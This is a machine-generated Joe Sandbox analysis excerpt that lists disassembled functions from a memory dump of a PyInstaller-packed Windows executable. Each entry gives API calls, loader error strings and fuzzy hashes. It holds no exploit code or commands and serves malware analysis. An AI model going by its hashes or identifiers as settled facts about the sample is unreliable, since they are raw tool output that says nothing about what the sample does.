                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Message
                                                                                                                                                                                                                                                                                                  • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                                                                  • API String ID: 2030045667-3659356012
                                                                                                                                                                                                                                                                                                  • Opcode ID: fc4d00e68c10bc6cfa12e2fd898941efbd925022891e855d312ef2fb0d8dc3ae
                                                                                                                                                                                                                                                                                                  • Instruction ID: d62ef731a3d152c9a9f09232222bef670092557b3c01b7afdf2eaea8e59c112c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc4d00e68c10bc6cfa12e2fd898941efbd925022891e855d312ef2fb0d8dc3ae
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF315E31B296C246EA24BB56A8405FAE390BF447D4FE84433DE8E17B55EE3CE545C720
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                                                  • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                                                                  • Opcode ID: 2b2a4badfdaa60d9abfb93841dcb65d735c0fc58e4118d1b5c2a51383b6331b7
                                                                                                                                                                                                                                                                                                  • Instruction ID: 2b1961045a6d713d026012f60854743af0b6a3c306c4d8d2e6c7c145ef381588
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2b2a4badfdaa60d9abfb93841dcb65d735c0fc58e4118d1b5c2a51383b6331b7
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35E18072A287818AEB20ABA5D4403FDB7A0FB45798FA00536EF4D57B95DF38E580C710
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF78F48101D), ref: 00007FF78F488747
                                                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF78F48101D), ref: 00007FF78F48879E
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide
                                                                                                                                                                                                                                                                                                  • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                                                                                                                                                                                  • API String ID: 626452242-27947307
                                                                                                                                                                                                                                                                                                  • Opcode ID: 3d8cc197ee630c3fb00dd31b72f24074ca9fe52add05c6a83a64952da4f63ba4
                                                                                                                                                                                                                                                                                                  • Instruction ID: 564d14f2c40377129ea56d01277de55a08a7bc0b603e1ea27a36f01bac9645fe
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d8cc197ee630c3fb00dd31b72f24074ca9fe52add05c6a83a64952da4f63ba4
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B418232A19BC282E660EF16B8401BAF6A1FB84790FB44136DE8D47BA5DF3CD455C710
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00007FF78F4839EA), ref: 00007FF78F488C31
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF78F4829E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF78F4887F2,?,?,?,?,?,?,?,?,?,?,?,00007FF78F48101D), ref: 00007FF78F482A14
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF78F4829E0: MessageBoxW.USER32 ref: 00007FF78F482AF0
                                                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00007FF78F4839EA), ref: 00007FF78F488CA5
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                                                                                                                                                                                  • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                                                                                                                                                                                  • API String ID: 3723044601-27947307
                                                                                                                                                                                                                                                                                                  • Opcode ID: 93215b2962e715be9f5aa91d99be70836a612e16585fb8aee950a2577366c4a3
                                                                                                                                                                                                                                                                                                  • Instruction ID: 4ed783029dd7ea2ce57dd61b455ff135eebcb04979613a4d8545e26ce0ab2d17
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 93215b2962e715be9f5aa91d99be70836a612e16585fb8aee950a2577366c4a3
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD216D71B1AB8685EB50EF16E8400B9F6A1FB84BD0BB44536DA4D43798EF3CE545C320
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo$_fread_nolock
                                                                                                                                                                                                                                                                                                  • String ID: %s%c%s$ERROR: file already exists but should not: %s$PYINSTALLER_STRICT_UNPACK_MODE$WARNING: file already exists but should not: %s$\
                                                                                                                                                                                                                                                                                                  • API String ID: 3231891352-3501660386
                                                                                                                                                                                                                                                                                                  • Opcode ID: 716029066da9aa7fdbb7f0bfe734846ac928b4b9348b4955f396da70c2eca7e6
                                                                                                                                                                                                                                                                                                  • Instruction ID: e094a0fb4bac1cb1323928a89225ac8367b7a4453dd704625556eb36b5f80b56
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 716029066da9aa7fdbb7f0bfe734846ac928b4b9348b4955f396da70c2eca7e6
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C513A30B2D6C341FA11B76999606F9A2917F85B90FF40132ED0D877D7EE2CE501C260
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF78F48E06A,?,?,?,00007FF78F48DD5C,?,?,00000001,00007FF78F48D979), ref: 00007FF78F48DE3D
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF78F48E06A,?,?,?,00007FF78F48DD5C,?,?,00000001,00007FF78F48D979), ref: 00007FF78F48DE4B
                                                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF78F48E06A,?,?,?,00007FF78F48DD5C,?,?,00000001,00007FF78F48D979), ref: 00007FF78F48DE75
                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,00007FF78F48E06A,?,?,?,00007FF78F48DD5C,?,?,00000001,00007FF78F48D979), ref: 00007FF78F48DEBB
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF78F48E06A,?,?,?,00007FF78F48DD5C,?,?,00000001,00007FF78F48D979), ref: 00007FF78F48DEC7
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                                                                                                                                                                  • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                                                                  • Opcode ID: fa40dd5a34ae4d0b6736a9b6b46f8404287a490a05e4db78c585315ae40f634e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 5e724005d5cd45da2ef7b9ee2b9ff2134517a6301e2a462d818629f4ee8e6697
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa40dd5a34ae4d0b6736a9b6b46f8404287a490a05e4db78c585315ae40f634e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B731B431A2BA8291EE52BB06A8005F9A3E4FF58BA4FB90536DD1D47754DF3DE444C320
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF78F488AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF78F482ABB), ref: 00007FF78F488B1A
                                                                                                                                                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF78F4879A1,00000000,?,00000000,00000000,?,00007FF78F48154F), ref: 00007FF78F48747F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF78F482B30: MessageBoxW.USER32 ref: 00007FF78F482C05
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF78F487456
                                                                                                                                                                                                                                                                                                  • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF78F4874DA
                                                                                                                                                                                                                                                                                                  • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF78F487493
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                                                                                  • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                                                                                                                                                                                                                                                                  • API String ID: 1662231829-3498232454
                                                                                                                                                                                                                                                                                                  • Opcode ID: 5e8575f0beacdb372a81e9debe9bb6d766e8e255e7029f60019f70bf69282784
                                                                                                                                                                                                                                                                                                  • Instruction ID: 962e9c82aabb6e3b90710f03ad0be53cd89ea4d8477e1baaf3c780657c44bf44
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e8575f0beacdb372a81e9debe9bb6d766e8e255e7029f60019f70bf69282784
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 99313371B2D6C241FA24BB2595652FA9291BF98780FF44437DA4E43B96EE2CE504C620
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF78F482ABB), ref: 00007FF78F488B1A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF78F4829E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF78F4887F2,?,?,?,?,?,?,?,?,?,?,?,00007FF78F48101D), ref: 00007FF78F482A14
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF78F4829E0: MessageBoxW.USER32 ref: 00007FF78F482AF0
                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF78F482ABB), ref: 00007FF78F488BA0
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                                                                                                                                                                                  • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                                                                                                                                                                                                  • API String ID: 3723044601-876015163
                                                                                                                                                                                                                                                                                                  • Opcode ID: 2a7f0904e5ec1897560545d2159a663e9c273eaf1fea03a0d1ae7df506dc6c73
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1ca6161b1e9d468c2ac9a21083eb46d3ccc3a28af30f50d90fbbb28f6e78137a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a7f0904e5ec1897560545d2159a663e9c273eaf1fea03a0d1ae7df506dc6c73
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE215376B19A8281EB50EB16F8410AAE3A1FFC47D4FA84132DB5C53BA9EF2DD541C710
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2506987500-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4c036152db15b5a2576d662e79388d683b1cca67e39eb64d5f9cdec899b2deef
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1b52ee8f29b61f363674035c641065ac61e555ca4360d5ed9001ec2880819c8c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c036152db15b5a2576d662e79388d683b1cca67e39eb64d5f9cdec899b2deef
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F219A34B082C285FA1477A156459F9E242BF847B0FB04736D93E07AFBDE2CA805C620
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                                                                  • String ID: CONOUT$
                                                                                                                                                                                                                                                                                                  • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                                                                  • Opcode ID: 47774de373198f8681994077b4026dd9a590ed4534763da2009e0dd4878e84a9
                                                                                                                                                                                                                                                                                                  • Instruction ID: efb0eda83e88125a6ec357e2ea1427410e7a4fb2ec585acf2daabc2bc2d3a606
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 47774de373198f8681994077b4026dd9a590ed4534763da2009e0dd4878e84a9
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B118131A18A8186F750AB82F854369B6A0FB88BE4FA44236DA1E877A4CF3CD444C750
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF78F4954CD,?,?,?,?,00007FF78F49F1BF,?,?,00000000,00007FF78F49B9A6,?,?,?), ref: 00007FF78F49B897
                                                                                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF78F4954CD,?,?,?,?,00007FF78F49F1BF,?,?,00000000,00007FF78F49B9A6,?,?,?), ref: 00007FF78F49B8CD
                                                                                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF78F4954CD,?,?,?,?,00007FF78F49F1BF,?,?,00000000,00007FF78F49B9A6,?,?,?), ref: 00007FF78F49B8FA
                                                                                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF78F4954CD,?,?,?,?,00007FF78F49F1BF,?,?,00000000,00007FF78F49B9A6,?,?,?), ref: 00007FF78F49B90B
                                                                                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF78F4954CD,?,?,?,?,00007FF78F49F1BF,?,?,00000000,00007FF78F49B9A6,?,?,?), ref: 00007FF78F49B91C
                                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(?,?,?,00007FF78F4954CD,?,?,?,?,00007FF78F49F1BF,?,?,00000000,00007FF78F49B9A6,?,?,?), ref: 00007FF78F49B937
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2506987500-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 8f76d250fbe0b5259abb4dbde422c74cf40887be6a771761d1db9f63c6a56687
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1cb88a8f2f8b36700793fa5e021d4ac1fdb438384ba4d13ddae5c033ff1a0812
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f76d250fbe0b5259abb4dbde422c74cf40887be6a771761d1db9f63c6a56687
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 53116F30B0D6C241F614B77155459F9E251BF887B0FF40736D82E476E7DE2CA505C620
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
